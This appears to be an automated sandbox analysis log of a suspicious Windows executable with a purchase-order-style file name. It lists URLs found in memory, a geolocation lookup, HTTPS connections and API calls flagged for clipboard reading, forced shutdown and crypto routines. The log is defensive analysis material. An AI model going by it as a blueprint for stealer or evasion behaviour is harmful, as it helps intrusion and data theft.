Source: SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe, 0000000B.00000002.5968030278.0000000036325000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://packetstormsecurity.com/
Source: SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe, 0000000B.00000002.5968030278.0000000036325000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://packetstormsecurity.com/files/22459/BIOS320.EXE.html
Source: SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe, 0000000B.00000002.5968030278.0000000036325000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://packetstormsecurity.com/files/download/22459/BIOS320.EXE
Source: SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe, 0000000B.00000002.5970021070.0000000037364000.00000004.00000800.00020000.00000000.sdmp, SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe, 0000000B.00000002.5970021070.0000000037587000.00000004.00000800.00020000.00000000.sdmp, SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe, 0000000B.00000002.5970021070.00000000373C9000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://packetstormsecurity.com/https://packetstormsecurity.com/files/download/22459/BIOS320.EXEhttp
Source: SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe, 0000000B.00000002.5968030278.000000003637A000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://reallyfreegeoip.org/xml/191.96.150.187
Source: SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe, 0000000B.00000002.5968030278.0000000036372000.00000004.00000800.00020000.00000000.sdmp, SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe, 0000000B.00000002.5968030278.000000003637A000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://reallyfreegeoip.org/xml/191.96.150.187$
Source: SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe, 0000000B.00000002.5970021070.0000000037364000.00000004.00000800.00020000.00000000.sdmp, SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe, 0000000B.00000002.5970021070.0000000037587000.00000004.00000800.00020000.00000000.sdmp, SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe, 0000000B.00000002.5970021070.00000000373C9000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://sdlc-esd.oracle.com/ESD6/JSCDL/jdk/8u301-b09/d3c52aa6bfa54d3ca74e617f18309292/JavaSetup8u301
Source: SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe, 0000000B.00000002.5970021070.000000003757B000.00000004.00000800.00020000.00000000.sdmp, SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe, 0000000B.00000002.5970021070.0000000037358000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://secure.eicar.org/eicar.com
Source: SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe, 0000000B.00000002.5970021070.000000003757B000.00000004.00000800.00020000.00000000.sdmp, SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe, 0000000B.00000002.5970021070.0000000037545000.00000004.00000800.00020000.00000000.sdmp, SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe, 0000000B.00000002.5970021070.0000000037593000.00000004.00000800.00020000.00000000.sdmp, SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe, 0000000B.00000002.5970021070.0000000037437000.00000004.00000800.00020000.00000000.sdmp, SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe, 0000000B.00000002.5970021070.0000000037370000.00000004.00000800.00020000.00000000.sdmp, SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe, 0000000B.00000002.5970021070.0000000037358000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://secure.eicar.org/eicar.com.txt
Source: SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe, 0000000B.00000002.5970021070.000000003757B000.00000004.00000800.00020000.00000000.sdmp, SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe, 0000000B.00000002.5970021070.00000000373B3000.00000004.00000800.00020000.00000000.sdmp, SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe, 0000000B.00000002.5970021070.0000000037358000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://secure.eicar.org/eicar.com.txt/
Source: SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe, 0000000B.00000002.5970021070.0000000037364000.00000004.00000800.00020000.00000000.sdmp, SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe, 0000000B.00000002.5970021070.0000000037587000.00000004.00000800.00020000.00000000.sdmp, SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe, 0000000B.00000002.5970021070.00000000373C9000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://secure.eicar.org/eicar.com.txtD
Source: SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe, 0000000B.00000002.5970021070.000000003757B000.00000004.00000800.00020000.00000000.sdmp, SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe, 0000000B.00000002.5970021070.00000000373B3000.00000004.00000800.00020000.00000000.sdmp, SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe, 0000000B.00000002.5970021070.0000000037358000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://secure.eicar.org/eicar.com/
Source: SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe, 0000000B.00000002.5970021070.0000000037545000.00000004.00000800.00020000.00000000.sdmp, SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe, 0000000B.00000002.5970021070.0000000037593000.00000004.00000800.00020000.00000000.sdmp, SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe, 0000000B.00000002.5970021070.0000000037437000.00000004.00000800.00020000.00000000.sdmp, SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe, 0000000B.00000002.5970021070.0000000037370000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://secure.eicar.org/eicar.com;
Source: SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe, 0000000B.00000003.1457512860.00000000059AE000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://ssl.gstatic.com
Source: SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe, 0000000B.00000002.5970021070.0000000037364000.00000004.00000800.00020000.00000000.sdmp, SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe, 0000000B.00000002.5970021070.0000000037587000.00000004.00000800.00020000.00000000.sdmp, SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe, 0000000B.00000002.5970021070.00000000373C9000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://stubdownloader.services.mozilla.com/?attribution_code=c291cmNlPXd3dy5nb29nbGUuY29tJm1lZGl1bT
Source: SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe, 0000000B.00000002.5968030278.00000000364C3000.00000004.00000800.00020000.00000000.sdmp, SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe, 0000000B.00000002.5968030278.000000003640B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://support.google.com/chrome/?p=plugin_flash
Source: SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe, 0000000B.00000002.5970021070.0000000037206000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://uk.search.yahoo.com/favicon.icohttps://uk.search.yahoo.com/search
Source: SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe, 0000000B.00000002.5970021070.0000000037206000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://uk.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe, 0000000B.00000002.5970021070.0000000037364000.00000004.00000800.00020000.00000000.sdmp, SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe, 0000000B.00000002.5970021070.0000000037587000.00000004.00000800.00020000.00000000.sdmp, SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe, 0000000B.00000002.5970021070.00000000373C9000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.autoitscript.com/cgi-bin/getfile.pl?autoit3/autoit-v3-setup.exe
Source: SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe, 0000000B.00000002.5970021070.0000000037364000.00000004.00000800.00020000.00000000.sdmp, SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe, 0000000B.00000002.5970021070.0000000037587000.00000004.00000800.00020000.00000000.sdmp, SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe, 0000000B.00000002.5970021070.00000000373C9000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.autoitscript.com/files/autoit3/autoit-v3-setup.exeQ
Source: SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe, 0000000B.00000002.5968030278.0000000036325000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.autoitscript.com/site/autoit/downloads/
Source: SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe, 0000000B.00000002.5970021070.0000000037364000.00000004.00000800.00020000.00000000.sdmp, SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe, 0000000B.00000002.5970021070.0000000037587000.00000004.00000800.00020000.00000000.sdmp, SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe, 0000000B.00000002.5970021070.00000000373C9000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.autoitscript.com/site/autoit/downloads/https://www.autoitscript.com/site/autoit/download
Source: SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe, 0000000B.00000002.5968030278.0000000036325000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.eicar.org/
Source: SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe, 0000000B.00000002.5968030278.0000000036325000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.eicar.org/download-anti-malware-testfile/
Source: SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe, 0000000B.00000002.5970021070.0000000037545000.00000004.00000800.00020000.00000000.sdmp, SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe, 0000000B.00000002.5970021070.0000000037593000.00000004.00000800.00020000.00000000.sdmp, SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe, 0000000B.00000002.5970021070.0000000037437000.00000004.00000800.00020000.00000000.sdmp, SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe, 0000000B.00000002.5970021070.0000000037370000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.eicar.org/download-anti-malware-testfile/:
Source: SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe, 0000000B.00000002.5970021070.000000003757B000.00000004.00000800.00020000.00000000.sdmp, SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe, 0000000B.00000002.5970021070.00000000373B3000.00000004.00000800.00020000.00000000.sdmp, SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe, 0000000B.00000002.5970021070.0000000037358000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.eicar.org/download-anti-malware-testfile/Download
Source: SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe, 0000000B.00000002.5970021070.0000000037364000.00000004.00000800.00020000.00000000.sdmp, SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe, 0000000B.00000002.5970021070.0000000037587000.00000004.00000800.00020000.00000000.sdmp, SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe, 0000000B.00000002.5970021070.00000000373C9000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.eicar.org/https://eicar.org/https://www.eicar.org/download-anti-malware-testfile/https:/
Source: SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe, 0000000B.00000003.1457512860.00000000059AE000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.google-analytics.com;report-uri
Source: SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe, 0000000B.00000003.1457512860.00000000059AE000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.google.com
Source: SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe, 0000000B.00000002.5968030278.0000000036325000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.google.com/
Source: SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe, 0000000B.00000002.5968030278.0000000036325000.00000004.00000800.00020000.00000000.sdmp, SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe, 0000000B.00000002.5970021070.0000000037358000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.google.com/chrome/?&brand=CHWL&utm_campaign=en&utm_source=en-et-na-us-chrome-bubble&utm_
Source: SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe, 0000000B.00000002.5970021070.0000000037358000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.google.com/chrome/next-steps.html?brand=CHWL&statcb=0&installdataindex=empty&defaultbrow
Source: SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe, 0000000B.00000002.5970021070.0000000037364000.00000004.00000800.00020000.00000000.sdmp, SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe, 0000000B.00000002.5970021070.0000000037587000.00000004.00000800.00020000.00000000.sdmp, SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe, 0000000B.00000002.5970021070.00000000373C9000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.google.com/https://www.google.com/chrome/?&brand=CHWL&utm_campaign=en&utm_source=en-et-n
Source: SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe, 0000000B.00000002.5970021070.0000000037206000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
Source: SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe, 0000000B.00000002.5970021070.0000000037358000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.google.com/search?q=eicar
Source: SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe, 0000000B.00000003.1457512860.00000000059AE000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.googletagmanager.com
Source: SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe, 0000000B.00000003.1457512860.00000000059AE000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.gstatic.com
Source: SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe, 0000000B.00000002.5968030278.0000000036325000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/en-GB/firefox/all/#product-desktop-release
Source: SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe, 0000000B.00000002.5970021070.0000000037364000.00000004.00000800.00020000.00000000.sdmp, SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe, 0000000B.00000002.5970021070.0000000037587000.00000004.00000800.00020000.00000000.sdmp, SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe, 0000000B.00000002.5970021070.00000000373C9000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/en-GB/firefox/all/#product-desktop-releasehttps://www.mozilla.org/en-GB/fire
Source: SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe, 0000000B.00000002.5968030278.0000000036325000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/en-GB/firefox/windows/
Source: SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe, 0000000B.00000002.5968030278.0000000036325000.00000004.00000800.00020000.00000000.sdmp, SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe, 0000000B.00000002.5968030278.0000000036316000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.office.com/
Source: unknown Network traffic detected: HTTP traffic on port 49708 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49720
Source: unknown Network traffic detected: HTTP traffic on port 49712 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49719 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49720 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49719
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49718
Source: unknown Network traffic detected: HTTP traffic on port 49713 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49717
Source: unknown Network traffic detected: HTTP traffic on port 49715 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49716
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49715
Source: unknown Network traffic detected: HTTP traffic on port 49717 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49714
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49713
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49712
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49711
Source: unknown Network traffic detected: HTTP traffic on port 49709 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49711 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49709
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49708
Source: unknown Network traffic detected: HTTP traffic on port 49716 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49714 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49718 -> 443
Source: unknown HTTPS traffic detected: 142.250.80.46:443 -> 192.168.11.20:49708 version: TLS 1.2
Source: unknown HTTPS traffic detected: 142.250.65.225:443 -> 192.168.11.20:49709 version: TLS 1.2
Source: unknown HTTPS traffic detected: 149.154.167.220:443 -> 192.168.11.20:49720 version: TLS 1.2
Contains functionality for read data from the clipboard
Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe Code function: 0_2_00405054 GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,ShowWindow,ShowWindow,GetDlgItem,SendMessageA,SendMessageA,SendMessageA,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,LdrInitializeThunk,SendMessageA,CreatePopupMenu,LdrInitializeThunk,AppendMenuA,GetWindowRect,TrackPopupMenu,SendMessageA,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageA,GlobalUnlock,LdrInitializeThunk,SetClipboardData,CloseClipboard, 0_2_00405054
Contains functionality to shutdown / reboot the system
Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe Code function: 0_2_004030D9 EntryPoint,SetErrorMode,GetVersion,#17,OleInitialize,SHGetFileInfoA,GetCommandLineA,GetModuleHandleA,CharNextA,LdrInitializeThunk,GetTempPathA,GetTempPathA,GetWindowsDirectoryA,lstrcatA,GetTempPathA,lstrcatA,SetEnvironmentVariableA,SetEnvironmentVariableA,SetEnvironmentVariableA,DeleteFileA,OleUninitialize,ExitProcess,lstrcatA,lstrcatA,lstrcatA,lstrcmpiA,SetCurrentDirectoryA,DeleteFileA,LdrInitializeThunk,CopyFileA,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess, 0_2_004030D9
Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe Code function: 11_2_004030D9 EntryPoint,SetErrorMode,GetVersion,#17,OleInitialize,SHGetFileInfoA,GetCommandLineA,GetModuleHandleA,CharNextA,LdrInitializeThunk,GetTempPathA,GetTempPathA,GetWindowsDirectoryA,lstrcatA,GetTempPathA,lstrcatA,SetEnvironmentVariableA,SetEnvironmentVariableA,SetEnvironmentVariableA,DeleteFileA,OleUninitialize,ExitProcess,lstrcatA,lstrcatA,lstrcatA,lstrcmpiA,SetCurrentDirectoryA,DeleteFileA,LdrInitializeThunk,CopyFileA,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess, 11_2_004030D9
Detected potential crypto function
Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe Code function: 0_2_00406344 0_2_00406344
Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe Code function: 0_2_00404893 0_2_00404893
Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe Code function: 11_2_00406344 11_2_00406344
Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe Code function: 11_2_00404893 11_2_00404893
Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe Code function: 11_2_0011C2B0 11_2_0011C2B0
Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe Code function: 11_2_001152FD 11_2_001152FD
Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe Code function: 11_2_0011C584 11_2_0011C584
Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe Code function: 11_2_0011E790 11_2_0011E790
Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe Code function: 11_2_0011C851 11_2_0011C851
Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe Code function: 11_2_00116920 11_2_00116920
Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe Code function: 11_2_0011CB25 11_2_0011CB25
Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe Code function: 11_2_0011BB48 11_2_0011BB48
Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe Code function: 11_2_0011CDF4 11_2_0011CDF4
Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe Code function: 11_2_00116F48 11_2_00116F48
Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe Code function: 11_2_0011BFE0 11_2_0011BFE0
Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe Code function: 11_2_0011F039 11_2_0011F039
Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe Code function: 11_2_0011F048 11_2_0011F048
Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe Code function: 11_2_0011E781 11_2_0011E781
Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe Code function: 11_2_001137E5 11_2_001137E5
Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe Code function: 11_2_001198A0 11_2_001198A0
Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe Code function: 11_2_00112974 11_2_00112974
Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe Code function: 11_2_001139B1 11_2_001139B1
Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe Code function: 11_2_0011FC8C 11_2_0011FC8C
Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe Code function: 11_2_0011BD10 11_2_0011BD10
Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe Code function: 11_2_00113D88 11_2_00113D88
Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe Code function: 11_2_385D0040 11_2_385D0040
Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe Code function: 11_2_385D10B8 11_2_385D10B8
Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe Code function: 11_2_385D89B0 11_2_385D89B0
Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe Code function: 11_2_385D92A0 11_2_385D92A0
Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe Code function: 11_2_385DC358 11_2_385DC358
Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe Code function: 11_2_385D1E80 11_2_385D1E80
Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe Code function: 11_2_385D46B0 11_2_385D46B0
Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe Code function: 11_2_385D1798 11_2_385D1798
Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe Code function: 11_2_385D0014 11_2_385D0014
Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe Code function: 11_2_385DF810 11_2_385DF810
Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe Code function: 11_2_385DF800 11_2_385DF800
Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe Code function: 11_2_385D10A9 11_2_385D10A9
Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe Code function: 11_2_385DD127 11_2_385DD127
Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe Code function: 11_2_385D8218 11_2_385D8218
Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe Code function: 11_2_385D8228 11_2_385D8228
Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe Code function: 11_2_385DC347 11_2_385DC347
Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe Code function: 11_2_385D8BD0 11_2_385D8BD0
Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe Code function: 11_2_385DF3B8 11_2_385DF3B8
Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe Code function: 11_2_385DF3A9 11_2_385DF3A9
Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe Code function: 11_2_385DFC68 11_2_385DFC68
Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe Code function: 11_2_385DE571 11_2_385DE571
Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe Code function: 11_2_385DE580 11_2_385DE580
Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe Code function: 11_2_385D1E70 11_2_385D1E70
Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe Code function: 11_2_385D46A0 11_2_385D46A0
Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe Code function: 11_2_385DEF51 11_2_385DEF51
Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe Code function: 11_2_385DEF60 11_2_385DEF60
Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe Code function: 11_2_385D1788 11_2_385D1788
Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe Code function: 11_2_385EA8E8 11_2_385EA8E8
Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe Code function: 11_2_385EA290 11_2_385EA290
